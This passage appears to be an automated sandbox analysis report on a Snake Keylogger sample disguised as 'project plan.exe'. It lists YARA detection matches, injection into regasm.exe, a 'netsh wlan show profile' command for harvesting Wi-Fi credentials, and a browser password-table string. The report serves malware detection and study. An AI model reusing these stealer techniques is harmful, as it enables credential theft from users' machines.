Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0614F013 3_2_0614F013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06145018 3_2_06145018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06140037 3_2_06140037
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06148438 3_2_06148438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06140040 3_2_06140040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0614E840 3_2_0614E840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06145470 3_2_06145470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0614F470 3_2_0614F470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06148897 3_2_06148897
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0614C0D9 3_2_0614C0D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061458C8 3_2_061458C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0614F8C9 3_2_0614F8C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06148CE9 3_2_06148CE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06145D2B 3_2_06145D2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06149140 3_2_06149140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0614617B 3_2_0614617B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0614C180 3_2_0614C180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061465D4 3_2_061465D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06164608 3_2_06164608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06162450 3_2_06162450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06160498 3_2_06160498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06166588 3_2_06166588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06160040 3_2_06160040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06164C58 3_2_06164C58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06162D00 3_2_06162D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06166BD8 3_2_06166BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061628A8 3_2_061628A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061608F0 3_2_061608F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06161748 3_2_06161748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061635B0 3_2_061635B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06167228 3_2_06167228
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061652A0 3_2_061652A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061693D2 3_2_061693D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06163158 3_2_06163158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06165F38 3_2_06165F38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06163FB8 3_2_06163FB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06161FF8 3_2_06161FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06161BA0 3_2_06161BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06167870 3_2_06167870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061658E8 3_2_061658E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06162440 3_2_06162440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06160488 3_2_06160488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06166578 3_2_06166578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061645F8 3_2_061645F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06160006 3_2_06160006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06164C48 3_2_06164C48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06162CF1 3_2_06162CF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06166BC8 3_2_06166BC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06162898 3_2_06162898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061608E0 3_2_061608E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06161739 3_2_06161739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061635A0 3_2_061635A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06167219 3_2_06167219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06165290 3_2_06165290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06163148 3_2_06163148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06165F29 3_2_06165F29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06163FA9 3_2_06163FA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06161FE9 3_2_06161FE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06161B8F 3_2_06161B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0616785F 3_2_0616785F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_061658D8 3_2_061658D8
One or more processes crash
Source: C:\Users\user\Desktop\project plan.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1536 -s 1028
PE file does not import any functions
Source: project plan.exe Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: project plan.exe, 00000000.00000000.1960972899.0000016754A42000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameIrulogixihejo> vs project plan.exe
Source: project plan.exe, 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs project plan.exe
Source: project plan.exe, 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameEcozezoviD vs project plan.exe
Source: project plan.exe, 00000000.00000002.2171707647.000001676EE60000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameEcozezoviD vs project plan.exe
Source: project plan.exe Binary or memory string: OriginalFilenameIrulogixihejo> vs project plan.exe
Yara signature match
Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.project plan.exe.16766a241c0.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.project plan.exe.16766a04378.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.3220109247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2170359604.000001676696F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegAsm.exe PID: 6132, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.project plan.exe.16766a04378.1.raw.unpack, --.cs Base64 encoded string: 'm6Xg2C2DGO3mlPcQp6s/LfmmtF6ui+8+Ju7mZMwu4ysjUr0OlymEIhyOhsWptaJK'
Source: 0.2.project plan.exe.16766a241c0.3.raw.unpack, --.cs Base64 encoded string: 'm6Xg2C2DGO3mlPcQp6s/LfmmtF6ui+8+Ju7mZMwu4ysjUr0OlymEIhyOhsWptaJK'
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@10/5@2/2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:120:WilError_03
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1536
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1568:120:WilError_03
Source: C:\Windows\System32\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\7da7a6c0-778d-46da-af75-79ac18eb5ec4 Jump to behavior
Source: project plan.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: project plan.exe Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
Source: C:\Users\user\Desktop\project plan.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RegAsm.exe, 00000003.00000002.3221467298.0000000002E1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002DC2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3222412002.0000000003CFB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002E2A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3221467298.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\Users\user\Desktop\project plan.exe File read: C:\Users\user\Desktop\project plan.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\project plan.exe "C:\Users\user\Desktop\project plan.exe"
Source: C:\Users\user\Desktop\project plan.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\project plan.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\Desktop\project plan.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\Desktop\project plan.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1536 -s 1028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profile
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\project plan.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\netsh.exe "netsh" wlan show profile Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll Jump to behavior
